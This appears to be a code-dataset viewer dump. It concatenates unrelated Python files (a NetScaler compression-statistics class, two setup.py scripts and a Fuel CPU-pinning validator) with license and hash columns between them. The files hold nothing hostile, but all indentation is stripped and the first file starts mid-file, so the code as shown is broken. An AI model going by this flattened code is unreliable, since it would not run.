from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class cmp_stats(base_resource) :
def __init__(self) :
self._clearstats = ""
self._delbwsaving = 0
self._delcmpratio = 0
self._decomptcpratio = 0
self._decomptcpbandwidthsaving = 0
self._comptcpratio = 0
self._comptcpbandwidthsaving = 0
self._comptotaldatacompressionratio = 0
self._comphttpbandwidthsaving = 0
self._compratio = 0
self._comptotalrequests = 0
self._comprequestsrate = 0
self._comptotalrxbytes = 0
self._comprxbytesrate = 0
self._comptotaltxbytes = 0
self._comptxbytesrate = 0
self._comptotalrxpackets = 0
self._comprxpacketsrate = 0
self._comptotaltxpackets = 0
self._comptxpacketsrate = 0
self._comptcptotalrxbytes = 0
self._comptcprxbytesrate = 0
self._comptcptotalrxpackets = 0
self._comptcprxpacketsrate = 0
self._comptcptotaltxbytes = 0
self._comptcptxbytesrate = 0
self._comptcptotaltxpackets = 0
self._comptcptxpacketsrate = 0
self._comptcptotalquantum = 0
self._comptcpquantumrate = 0
self._comptcptotalpush = 0
self._comptcppushrate = 0
self._comptcptotaleoi = 0
self._comptcpeoirate = 0
self._comptcptotaltimer = 0
self._comptcptimerrate = 0
self._decomptcprxbytes = 0
self._decomptcprxbytesrate = 0
self._decomptcprxpackets = 0
self._decomptcprxpacketsrate = 0
self._decomptcptxbytes = 0
self._decomptcptxbytesrate = 0
self._decomptcptxpackets = 0
self._decomptcptxpacketsrate = 0
self._decomptcperrdata = 0
self._decomptcperrdatarate = 0
self._decomptcperrlessdata = 0
self._decomptcperrlessdatarate = 0
self._decomptcperrmoredata = 0
self._decomptcperrmoredatarate = 0
self._decomptcperrmemory = 0
self._decomptcperrmemoryrate = 0
self._decomptcperrunknown = 0
self._decomptcperrunknownrate = 0
self._delcomptotalrequests = 0
self._delcomprequestsrate = 0
self._delcompdone = 0
self._delcompdonerate = 0
self._delcomptcprxbytes = 0
self._delcomptcprxbytesrate = 0
self._delcomptcptxbytes = 0
self._delcomptcptxbytesrate = 0
self._delcompfirstaccess = 0
self._delcompfirstaccessrate = 0
self._delcomptcprxpackets = 0
self._delcomptcprxpacketsrate = 0
self._delcomptcptxpackets = 0
self._delcomptcptxpacketsrate = 0
self._delcompbaseserved = 0
self._delcompbaseservedrate = 0
self._delcompbasetcptxbytes = 0
self._delcompbasetcptxbytesrate = 0
self._delcomperrbypassed = 0
self._delcomperrbypassedrate = 0
self._delcomperrbfilewhdrfailed = 0
self._delcomperrbfilewhdrfailedrate = 0
self._delcomperrnostoremiss = 0
self._delcomperrnostoremissrate = 0
self._delcomperrreqinfotoobig = 0
self._delcomperrreqinfotoobigrate = 0
self._delcomperrreqinfoallocfail = 0
self._delcomperrreqinfoallocfailrate = 0
self._delcomperrsessallocfail = 0
self._delcomperrsessallocfailrate = 0
@property
def clearstats(self) :
"""Clear the statsistics / counters.<br/>Possible values = basic, full.
"""
try :
return self._clearstats
except Exception as e:
raise e
@clearstats.setter
def clearstats(self, clearstats) :
"""Clear the statsistics / counters
"""
try :
self._clearstats = clearstats
except Exception as e:
raise e
@property
def delcompbasetcptxbytes(self) :
"""Number of basefile bytes transmitted by NetScaler.
"""
try :
return self._delcompbasetcptxbytes
except Exception as e:
raise e
@property
def comphttpbandwidthsaving(self) :
"""Bandwidth saving from TCP compression expressed as percentage.
"""
try :
return self._comphttpbandwidthsaving
except Exception as e:
raise e
@property
def comptcptotalpush(self) :
"""Number of times the NetScaler compresses data on receiving a TCP PUSH flag from the server. The PUSH flag ensures that data is compressed immediately without waiting for the buffered data size to reach the quantum size.
"""
try :
return self._comptcptotalpush
except Exception as e:
raise e
@property
def delcompfirstaccess(self) :
"""Total number of delta compression first accesses.
"""
try :
return self._delcompfirstaccess
except Exception as e:
raise e
@property
def delcompdone(self) :
"""Total number of delta compressions done by NetScaler.
"""
try :
return self._delcompdone
except Exception as e:
raise e
@property
def comptcptotalrxpackets(self) :
"""Total number of compressible packets received by NetScaler.
"""
try :
return self._comptcptotalrxpackets
except Exception as e:
raise e
@property
def delcomperrbypassed(self) :
"""Number of times delta-compression bypassed by NetScaler.
"""
try :
return self._delcomperrbypassed
except Exception as e:
raise e
@property
def decomptcptxpacketsrate(self) :
"""Rate (/s) counter for decomptcptxpackets.
"""
try :
return self._decomptcptxpacketsrate
except Exception as e:
raise e
@property
def delcompbasetcptxbytesrate(self) :
"""Rate (/s) counter for delcompbasetcptxbytes.
"""
try :
return self._delcompbasetcptxbytesrate
except Exception as e:
raise e
@property
def delbwsaving(self) :
"""Bandwidth saving from delta compression expressed as percentage.
"""
try :
return self._delbwsaving
except Exception as e:
raise e
@property
def comprequestsrate(self) :
"""Rate (/s) counter for comptotalrequests.
"""
try :
return self._comprequestsrate
except Exception as e:
raise e
@property
def comptotaltxbytes(self) :
"""Number of bytes the NetScaler sends to the client after compressing the response from the server.
"""
try :
return self._comptotaltxbytes
except Exception as e:
raise e
@property
def comptcpeoirate(self) :
"""Rate (/s) counter for comptcptotaleoi.
"""
try :
return self._comptcpeoirate
except Exception as e:
raise e
@property
def delcomptcptxbytes(self) :
"""Total number of delta-compressed bytes transmitted by NetScaler.
"""
try :
return self._delcomptcptxbytes
except Exception as e:
raise e
@property
def delcomperrreqinfoallocfail(self) :
"""Number of times requested basefile could not be allocated.
"""
try :
return self._delcomperrreqinfoallocfail
except Exception as e:
raise e
@property
def delcomperrbypassedrate(self) :
"""Rate (/s) counter for delcomperrbypassed.
"""
try :
return self._delcomperrbypassedrate
except Exception as e:
raise e
@property
def delcmpratio(self) :
"""Ratio of compressible data received to compressed data transmitted.If this ratio is one (uncmp:1.0) that means compression is disabled or we are not able to compress even a single compressible packet.
"""
try :
return self._delcmpratio
except Exception as e:
raise e
@property
def delcomprequestsrate(self) :
"""Rate (/s) counter for delcomptotalrequests.
"""
try :
return self._delcomprequestsrate
except Exception as e:
raise e
@property
def delcomperrreqinfotoobig(self) :
"""Number of times basefile request URL was too large.
"""
try :
return self._delcomperrreqinfotoobig
except Exception as e:
raise e
@property
def delcomptcprxpacketsrate(self) :
"""Rate (/s) counter for delcomptcprxpackets.
"""
try :
return self._delcomptcprxpacketsrate
except Exception as e:
raise e
@property
def decomptcperrmemory(self) :
"""Number of times memory failures occurred while decompressing.
"""
try :
return self._decomptcperrmemory
except Exception as e:
raise e
@property
def decomptcprxbytes(self) :
"""Total number of compressed bytes received by NetScaler.
"""
try :
return self._decomptcprxbytes
except Exception as e:
raise e
@property
def comptcptxpacketsrate(self) :
"""Rate (/s) counter for comptcptotaltxpackets.
"""
try :
return self._comptcptxpacketsrate
except Exception as e:
raise e
@property
def comptotaldatacompressionratio(self) :
"""Ratio of total HTTP data received to total HTTP data transmitted.
"""
try :
return self._comptotaldatacompressionratio
except Exception as e:
raise e
@property
def comprxbytesrate(self) :
"""Rate (/s) counter for comptotalrxbytes.
"""
try :
return self._comprxbytesrate
except Exception as e:
raise e
@property
def delcomperrsessallocfailrate(self) :
"""Rate (/s) counter for delcomperrsessallocfail.
"""
try :
return self._delcomperrsessallocfailrate
except Exception as e:
raise e
@property
def delcomptcptxpacketsrate(self) :
"""Rate (/s) counter for delcomptcptxpackets.
"""
try :
return self._delcomptcptxpacketsrate
except Exception as e:
raise e
@property
def comptcptotaleoi(self) :
"""Number of times the NetScaler compresses data on receiving End Of Input (FIN packet). When the NetScaler receives End Of Input (FIN packet), it compresses the buffered data immediately without waiting for the buffered data size to reach the quantum size.
"""
try :
return self._comptcptotaleoi
except Exception as e:
raise e
@property
def comptcppushrate(self) :
"""Rate (/s) counter for comptcptotalpush.
"""
try :
return self._comptcppushrate
except Exception as e:
raise e
@property
def decomptcperrmemoryrate(self) :
"""Rate (/s) counter for decomptcperrmemory.
"""
try :
return self._decomptcperrmemoryrate
except Exception as e:
raise e
@property
def decomptcperrunknownrate(self) :
"""Rate (/s) counter for decomptcperrunknown.
"""
try :
return self._decomptcperrunknownrate
except Exception as e:
raise e
@property
def comptcpbandwidthsaving(self) :
"""Bandwidth saving from TCP compression expressed as percentage.
"""
try :
return self._comptcpbandwidthsaving
except Exception as e:
raise e
@property
def decomptcperrmoredata(self) :
"""Number of times NetScaler received more data than declared by protocol.
"""
try :
return self._decomptcperrmoredata
except Exception as e:
raise e
@property
def delcompfirstaccessrate(self) :
"""Rate (/s) counter for delcompfirstaccess.
"""
try :
return self._delcompfirstaccessrate
except Exception as e:
raise e
@property
def comprxpacketsrate(self) :
"""Rate (/s) counter for comptotalrxpackets.
"""
try :
return self._comprxpacketsrate
except Exception as e:
raise e
@property
def comptotalrxbytes(self) :
"""Number of bytes that can be compressed, which the NetScaler receives from the server. This gives the content length of the response that the NetScaler receives from server.
"""
try :
return self._comptotalrxbytes
except Exception as e:
raise e
@property
def decomptcprxpacketsrate(self) :
"""Rate (/s) counter for decomptcprxpackets.
"""
try :
return self._decomptcprxpacketsrate
except Exception as e:
raise e
@property
def comptcpquantumrate(self) :
"""Rate (/s) counter for comptcptotalquantum.
"""
try :
return self._comptcpquantumrate
except Exception as e:
raise e
@property
def comptxbytesrate(self) :
"""Rate (/s) counter for comptotaltxbytes.
"""
try :
return self._comptxbytesrate
except Exception as e:
raise e
@property
def delcompbaseservedrate(self) :
"""Rate (/s) counter for delcompbaseserved.
"""
try :
return self._delcompbaseservedrate
except Exception as e:
raise e
@property
def decomptcptxbytes(self) :
"""Total number of decompressed bytes transmitted by NetScaler.
"""
try :
return self._decomptcptxbytes
except Exception as e:
raise e
@property
def comptcptxbytesrate(self) :
"""Rate (/s) counter for comptcptotaltxbytes.
"""
try :
return self._comptcptxbytesrate
except Exception as e:
raise e
@property
def delcomptcprxpackets(self) :
"""Number of delta-compressible packets received.
"""
try :
return self._delcomptcprxpackets
except Exception as e:
raise e
@property
def decomptcprxpackets(self) :
"""Total number of compressed packets received by NetScaler.
"""
try :
return self._decomptcprxpackets
except Exception as e:
raise e
@property
def comptcptotaltimer(self) :
"""Number of times the NetScaler compresses data on expiration of data accumulation timer. The timer expires if the server response is very slow and consequently, the NetScaler does not receive response for a certain amount of time. Under such a condition, the NetScaler compresses the buffered data immediately without waiting for the buffered data size to reach the quantum size.
"""
try :
return self._comptcptotaltimer
except Exception as e:
raise e
@property
def delcomperrnostoremissrate(self) :
"""Rate (/s) counter for delcomperrnostoremiss.
"""
try :
return self._delcomperrnostoremissrate
except Exception as e:
raise e
@property
def delcomperrbfilewhdrfailed(self) :
"""Number of times basefile could not be updated in NetScaler cache.
"""
try :
return self._delcomperrbfilewhdrfailed
except Exception as e:
raise e
@property
def decomptcperrmoredatarate(self) :
"""Rate (/s) counter for decomptcperrmoredata.
"""
try :
return self._decomptcperrmoredatarate
except Exception as e:
raise e
@property
def decomptcpbandwidthsaving(self) :
"""Bandwidth saving from TCP compression expressed as percentage.
"""
try :
return self._decomptcpbandwidthsaving
except Exception as e:
raise e
@property
def delcomperrsessallocfail(self) :
"""Number of times delta compression session could not be allocated.
"""
try :
return self._delcomperrsessallocfail
except Exception as e:
raise e
@property
def delcompbaseserved(self) :
"""Total number of basefile requests served by NetScaler.
"""
try :
return self._delcompbaseserved
except Exception as e:
raise e
@property
def compratio(self) :
"""Ratio of the compressible data received from the server to the compressed data sent to the client.
"""
try :
return self._compratio
except Exception as e:
raise e
@property
def decomptcptxbytesrate(self) :
"""Rate (/s) counter for decomptcptxbytes.
"""
try :
return self._decomptcptxbytesrate
except Exception as e:
raise e
@property
def decomptcperrlessdata(self) :
"""Number of times NetScaler received less data than declared by protocol.
"""
try :
return self._decomptcperrlessdata
except Exception as e:
raise e
@property
def comptcprxbytesrate(self) :
"""Rate (/s) counter for comptcptotalrxbytes.
"""
try :
return self._comptcprxbytesrate
except Exception as e:
raise e
@property
def comptxpacketsrate(self) :
"""Rate (/s) counter for comptotaltxpackets.
"""
try :
return self._comptxpacketsrate
except Exception as e:
raise e
@property
def comptcprxpacketsrate(self) :
"""Rate (/s) counter for comptcptotalrxpackets.
"""
try :
return self._comptcprxpacketsrate
except Exception as e:
raise e
@property
def comptotaltxpackets(self) :
"""Number of HTTP packets that the NetScaler sends to the client after compressing the response from the server.
"""
try :
return self._comptotaltxpackets
except Exception as e:
raise e
@property
def delcomptcptxbytesrate(self) :
"""Rate (/s) counter for delcomptcptxbytes.
"""
try :
return self._delcomptcptxbytesrate
except Exception as e:
raise e
@property
def delcomperrreqinfotoobigrate(self) :
"""Rate (/s) counter for delcomperrreqinfotoobig.
"""
try :
return self._delcomperrreqinfotoobigrate
except Exception as e:
raise e
@property
def decomptcprxbytesrate(self) :
"""Rate (/s) counter for decomptcprxbytes.
"""
try :
return self._decomptcprxbytesrate
except Exception as e:
raise e
@property
def decomptcperrdatarate(self) :
"""Rate (/s) counter for decomptcperrdata.
"""
try :
return self._decomptcperrdatarate
except Exception as e:
raise e
@property
def comptotalrequests(self) :
"""Number of HTTP compression requests the NetScaler receives for which the response is successfully compressed. For example, after you enable compression and configure services, if you send requests to the NetScaler with the following header information: "Accept-Encoding: gzip, deflate", and NetScaler compresses the corresponding response, this counter is incremented.
"""
try :
return self._comptotalrequests
except Exception as e:
raise e
@property
def decomptcperrunknown(self) :
"""Number of times unknown errors occurred while decompressing.
"""
try :
return self._decomptcperrunknown
except Exception as e:
raise e
@property
def comptotalrxpackets(self) :
"""Number of HTTP packets that can be compressed, which the NetScaler receives from the server.
"""
try :
return self._comptotalrxpackets
except Exception as e:
raise e
@property
def delcomptcprxbytes(self) :
"""Total number of delta-compressible bytes received by NetScaler.
"""
try :
return self._delcomptcprxbytes
except Exception as e:
raise e
@property
def comptcptimerrate(self) :
"""Rate (/s) counter for comptcptotaltimer.
"""
try :
return self._comptcptimerrate
except Exception as e:
raise e
@property
def comptcptotalquantum(self) :
"""Number of times the NetScaler compresses a quantum of data. NetScaler buffers the data received from the server till it reaches the quantum size and then compresses the buffered data and transmits to the client.
"""
try :
return self._comptcptotalquantum
except Exception as e:
raise e
@property
def comptcptotaltxpackets(self) :
"""Number of TCP packets that the NetScaler sends to the client after compressing the response from the server.
"""
try :
return self._comptcptotaltxpackets
except Exception as e:
raise e
@property
def delcompdonerate(self) :
"""Rate (/s) counter for delcompdone.
"""
try :
return self._delcompdonerate
except Exception as e:
raise e
@property
def delcomptcptxpackets(self) :
"""Total number of delta-compressed packets transmitted by NetScaler.
"""
try :
return self._delcomptcptxpackets
except Exception as e:
raise e
@property
def decomptcpratio(self) :
"""Ratio of decompressed data transmitted to compressed data received.
"""
try :
return self._decomptcpratio
except Exception as e:
raise e
@property
def decomptcperrlessdatarate(self) :
"""Rate (/s) counter for decomptcperrlessdata.
"""
try :
return self._decomptcperrlessdatarate
except Exception as e:
raise e
@property
def comptcptotalrxbytes(self) :
"""Number of bytes that can be compressed, which the NetScaler receives from the server. This gives the content length of the response that the NetScaler receives from server.
"""
try :
return self._comptcptotalrxbytes
except Exception as e:
raise e
@property
def delcomptcprxbytesrate(self) :
"""Rate (/s) counter for delcomptcprxbytes.
"""
try :
return self._delcomptcprxbytesrate
except Exception as e:
raise e
@property
def comptcptotaltxbytes(self) :
"""Number of bytes that the NetScaler sends to the client after compressing the response from the server.
"""
try :
return self._comptcptotaltxbytes
except Exception as e:
raise e
@property
def decomptcptxpackets(self) :
"""Total number of decompressed packets transmitted by NetScaler.
"""
try :
return self._decomptcptxpackets
except Exception as e:
raise e
@property
def delcomptotalrequests(self) :
"""Total number of delta compression requests received by NetScaler.
"""
try :
return self._delcomptotalrequests
except Exception as e:
raise e
@property
def delcomperrreqinfoallocfailrate(self) :
"""Rate (/s) counter for delcomperrreqinfoallocfail.
"""
try :
return self._delcomperrreqinfoallocfailrate
except Exception as e:
raise e
@property
def delcomperrbfilewhdrfailedrate(self) :
"""Rate (/s) counter for delcomperrbfilewhdrfailed.
"""
try :
return self._delcomperrbfilewhdrfailedrate
except Exception as e:
raise e
@property
def delcomperrnostoremiss(self) :
"""Number of times basefile was not found in NetScaler cache.
"""
try :
return self._delcomperrnostoremiss
except Exception as e:
raise e
@property
def comptcpratio(self) :
"""Ratio of compressible data received to compressed data transmitted.If this ratio is one (uncmp:1.0) that means compression is disabled or we are not able to compress even a single compressible packet.
"""
try :
return self._comptcpratio
except Exception as e:
raise e
@property
def decomptcperrdata(self) :
"""Number of data errors encountered while decompressing.
"""
try :
return self._decomptcperrdata
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(cmp_response, response, self.__class__.__name__.replace('_stats',''))
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.cmp
except Exception as e :
raise e
def _get_object_name(self) :
""" Returns the value of object identifier argument
"""
try :
return None
except Exception as e :
raise e
@classmethod
def get(cls, service, name="", option_="") :
""" Use this API to fetch the statistics of all cmp_stats resources that are configured on netscaler.
"""
try :
obj = cmp_stats()
if not name :
response = obj.stat_resources(service, option_)
return response
except Exception as e:
raise e
class Clearstats:
basic = "basic"
full = "full"
class cmp_response(base_response) :
def __init__(self, length=1) :
self.cmp = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.cmp = [cmp_stats() for _ in range(length)]
| apache-2.0 | 1,323,930,941,714,670,600 | 24.039914 | 384 | 0.721006 | false |
InfectedPacket/resyst | setup.py | 1 | 8840 | # -*- coding: utf-8 -*-
from __future__ import print_function
import os
import sys
import imp
import subprocess
## Python 2.6 subprocess.check_output compatibility. Thanks Greg Hewgill!
if 'check_output' not in dir(subprocess):
def check_output(cmd_args, *args, **kwargs):
proc = subprocess.Popen(
cmd_args, *args,
stdout=subprocess.PIPE, stderr=subprocess.PIPE, **kwargs)
out, err = proc.communicate()
if proc.returncode != 0:
raise subprocess.CalledProcessError(args)
return out
subprocess.check_output = check_output
from setuptools import setup, find_packages
from setuptools.command.test import test as TestCommand
from distutils import spawn
try:
import colorama
colorama.init() # Initialize colorama on Windows
except ImportError:
# Don't require colorama just for running paver tasks. This allows us to
# run `paver install' without requiring the user to first have colorama
# installed.
pass
# Add the current directory to the module search path.
sys.path.insert(0, os.path.abspath('.'))
## Constants
CODE_DIRECTORY = 'resyst'
DOCS_DIRECTORY = 'docs'
TESTS_DIRECTORY = 'tests'
PYTEST_FLAGS = ['--doctest-modules']
# Import metadata. Normally this would just be:
#
# from resyst import metadata
#
# However, when we do this, we also import `resyst/__init__.py'. If this
# imports names from some other modules and these modules have third-party
# dependencies that need installing (which happens after this file is run), the
# script will crash. What we do instead is to load the metadata module by path
# instead, effectively side-stepping the dependency problem. Please make sure
# metadata has no dependencies, otherwise they will need to be added to
# the setup_requires keyword.
metadata = imp.load_source(
'metadata', os.path.join(CODE_DIRECTORY, 'metadata.py'))
## Miscellaneous helper functions
def get_project_files():
"""Retrieve a list of project files, ignoring hidden files.
:return: sorted list of project files
:rtype: :class:`list`
"""
if is_git_project() and has_git():
return get_git_project_files()
project_files = []
for top, subdirs, files in os.walk('.'):
for subdir in subdirs:
if subdir.startswith('.'):
subdirs.remove(subdir)
for f in files:
if f.startswith('.'):
continue
project_files.append(os.path.join(top, f))
return project_files
def is_git_project():
return os.path.isdir('.git')
def has_git():
return bool(spawn.find_executable("git"))
def get_git_project_files():
"""Retrieve a list of all non-ignored files, including untracked files,
excluding deleted files.
:return: sorted list of git project files
:rtype: :class:`list`
"""
cached_and_untracked_files = git_ls_files(
'--cached', # All files cached in the index
'--others', # Untracked files
# Exclude untracked files that would be excluded by .gitignore, etc.
'--exclude-standard')
uncommitted_deleted_files = git_ls_files('--deleted')
# Since sorting of files in a set is arbitrary, return a sorted list to
# provide a well-defined order to tools like flake8, etc.
return sorted(cached_and_untracked_files - uncommitted_deleted_files)
def git_ls_files(*cmd_args):
"""Run ``git ls-files`` in the top-level project directory. Arguments go
directly to execution call.
:return: set of file names
:rtype: :class:`set`
"""
cmd = ['git', 'ls-files']
cmd.extend(cmd_args)
return set(subprocess.check_output(cmd).splitlines())
def print_success_message(message):
"""Print a message indicating success in green color to STDOUT.
:param message: the message to print
:type message: :class:`str`
"""
try:
import colorama
print(colorama.Fore.GREEN + message + colorama.Fore.RESET)
except ImportError:
print(message)
def print_failure_message(message):
"""Print a message indicating failure in red color to STDERR.
:param message: the message to print
:type message: :class:`str`
"""
try:
import colorama
print(colorama.Fore.RED + message + colorama.Fore.RESET,
file=sys.stderr)
except ImportError:
print(message, file=sys.stderr)
def read(filename):
"""Return the contents of a file.
:param filename: file path
:type filename: :class:`str`
:return: the file's content
:rtype: :class:`str`
"""
with open(os.path.join(os.path.dirname(__file__), filename)) as f:
return f.read()
def _lint():
"""Run lint and return an exit code."""
# Flake8 doesn't have an easy way to run checks using a Python function, so
# just fork off another process to do it.
# Python 3 compat:
# - The result of subprocess call outputs are byte strings, meaning we need
# to pass a byte string to endswith.
project_python_files = [filename for filename in get_project_files()
if filename.endswith(b'.py')]
retcode = subprocess.call(
['flake8', '--max-complexity=10'] + project_python_files)
if retcode == 0:
print_success_message('No style errors')
return retcode
def _test():
"""Run the unit tests.
:return: exit code
"""
# Make sure to import pytest in this function. For the reason, see here:
# <http://pytest.org/latest/goodpractises.html#integration-with-setuptools-test-commands> # NOPEP8
import pytest
# This runs the unit tests.
# It also runs doctest, but only on the modules in TESTS_DIRECTORY.
return pytest.main(PYTEST_FLAGS + [TESTS_DIRECTORY])
def _test_all():
"""Run lint and tests.
:return: exit code
"""
return _lint() + _test()
# The following code is to allow tests to be run with `python setup.py test'.
# The main reason to make this possible is to allow tests to be run as part of
# Setuptools' automatic run of 2to3 on the source code. The recommended way to
# run tests is still `paver test_all'.
# See <http://pythonhosted.org/setuptools/python3.html>
# Code based on <http://pytest.org/latest/goodpractises.html#integration-with-setuptools-test-commands> # NOPEP8
class TestAllCommand(TestCommand):
def finalize_options(self):
TestCommand.finalize_options(self)
# These are fake, and just set to appease distutils and setuptools.
self.test_suite = True
self.test_args = []
def run_tests(self):
raise SystemExit(_test_all())
# define install_requires for specific Python versions
python_version_specific_requires = []
# as of Python >= 2.7 and >= 3.2, the argparse module is maintained within
# the Python standard library, otherwise we install it as a separate package
if sys.version_info < (2, 7) or (3, 0) <= sys.version_info < (3, 3):
python_version_specific_requires.append('argparse')
# See here for more options:
# <http://pythonhosted.org/setuptools/setuptools.html>
setup_dict = dict(
name=metadata.package,
version=metadata.version,
author=metadata.authors[0],
author_email=metadata.emails[0],
maintainer=metadata.authors[0],
maintainer_email=metadata.emails[0],
url=metadata.url,
description=metadata.description,
long_description=read('README.rst'),
# Find a list of classifiers here:
# <http://pypi.python.org/pypi?%3Aaction=list_classifiers>
classifiers=[
'Development Status :: 1 - Planning',
'Environment :: Console',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: Implementation :: PyPy',
'Topic :: Documentation',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: System :: Installation/Setup',
'Topic :: System :: Software Distribution',
],
packages=find_packages(exclude=(TESTS_DIRECTORY,)),
install_requires=[
# your module dependencies
] + python_version_specific_requires,
# Allow tests to be run with `python setup.py test'.
tests_require=[
'pytest==2.5.1',
'mock==1.0.1',
'flake8==2.1.0',
],
cmdclass={'test': TestAllCommand},
zip_safe=False, # don't use eggs
entry_points={
'console_scripts': [
'resyst_cli = resyst.main:entry_point'
],
# if you have a gui, use this
# 'gui_scripts': [
# 'resyst_gui = resyst.gui:entry_point'
# ]
}
)
def main():
setup(**setup_dict)
if __name__ == '__main__':
main()
| gpl-2.0 | -3,563,016,569,662,075,000 | 30.347518 | 113 | 0.654638 | false |
pbasov/fuel-extension-cpu-pinning | fuel_extension_cpu_pinning/validators.py | 1 | 1623 | from fuel_extension_cpu_pinning.models import CpuPinOverride
from nailgun.api.v1.validators.base import BasicValidator
from nailgun.errors import errors
from nailgun.logger import logger
class CpuPinningValidator(BasicValidator):
schema = {
"$schema": "http://json-schema.org/draft-04/schema#",
"title": "CPU pinning for Nova and Contrail vrouter",
"description": "CPU cores masks",
"type": "object",
"properties": {
"nova_cores": {"type": "array"},
"vrouter_cores": {"type": "array"},
},
}
@classmethod
def validate(cls, data, node=None, pins_data=None):
"""Check input data for intersections
to ensure correct core bindings
"""
dict_data = cls.validate_json(data)
cls.validate_schema(dict_data, cls.schema)
api_nova_cores = dict_data.get('nova_cores', [])
api_vrouter_cores = dict_data.get('vrouter_cores', [])
db_nova_cores = pins_data.get('nova_cores') or []
db_vrouter_cores = pins_data.get('vrouter_cores') or []
if set(api_nova_cores) & set(api_vrouter_cores) != set():
raise errors.InvalidData('Input values conflict with each other')
if all(cores != [] for cores in (api_nova_cores, api_vrouter_cores)):
return dict_data
if any(condition != set() for condition in [
set(api_nova_cores) & set(db_vrouter_cores),
set(api_vrouter_cores) & set(db_nova_cores)]
):
raise errors.InvalidData('Input values conflict with existing one')
return dict_data
| apache-2.0 | 5,613,233,836,513,574,000 | 36.744186 | 79 | 0.610598 | false |
akvo/butler | setup.py | 1 | 2525 | # -*- coding: UTF-8 -*-
from distutils.command.install import INSTALL_SCHEMES
from distutils.core import setup
from setuptools import find_packages
import os
import re
import time
_version = "0.1.%sdev0" % int(time.time())
_packages = find_packages('butler', exclude=["*.tests", "*.tests.*", "tests.*", "tests"])
# make sure that data files go into the right place
# see http://groups.google.com/group/comp.lang.python/browse_thread/thread/35ec7b2fed36eaec/2105ee4d9e8042cb
for scheme in INSTALL_SCHEMES.values():
scheme['data'] = scheme['purelib']
# find any static content such as HTML files or CSS
_INCLUDE = re.compile("^.*\.(html|less|css|js|png|gif|jpg|mo|eot|svg|ttf|woff|otf|json|conf|txt|ico)$")
_root_directory='butler'
def get_package_data():
package_data = {}
for pkg in os.listdir(_root_directory):
pkg_path = os.path.join(_root_directory, pkg)
if os.path.isdir(pkg_path):
package_data[pkg] = create_paths(pkg_path)
return package_data
def create_paths(root_dir):
paths = []
is_package = os.path.exists(os.path.join(root_dir, '__init__.py'))
children = os.listdir(root_dir)
for child in children:
childpath = os.path.join(root_dir, child)
if os.path.isfile(childpath) and not is_package and _INCLUDE.match(child):
paths.append(child)
if os.path.isdir(childpath):
paths += [os.path.join( child, path ) for path in create_paths( os.path.join(root_dir, child) ) ]
return paths
_reqs_dir = os.path.join(os.path.dirname(__file__), 'requirements')
def _strip_comments(line):
return line.split('#', 1)[0].strip()
def _get_reqs(req):
with open(os.path.join( _reqs_dir, req ) ) as f:
requires = f.readlines()
requires = map(_strip_comments, requires)
requires = filter( lambda x:x.strip()!='', requires )
return requires
_install_requires = _get_reqs('common.txt')
_extras_require = {
'psql': _get_reqs('psql.txt'),
'mysql': _get_reqs('mysql.txt'),
}
_data_files = [('', ['requirements/%s' % reqs_file for reqs_file in os.listdir(_reqs_dir)])]
setup(
name='butler',
version=_version,
packages=_packages,
package_dir={'': 'butler'},
package_data=get_package_data(),
install_requires=_install_requires,
extras_require=_extras_require,
data_files=_data_files,
author='Akvo.org',
author_email='[email protected]',
url='https://github.com/akvo/akvo-butler',
license='Affero GPL',
)
| agpl-3.0 | -8,536,758,986,645,435,000 | 27.693182 | 109 | 0.643564 | false |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.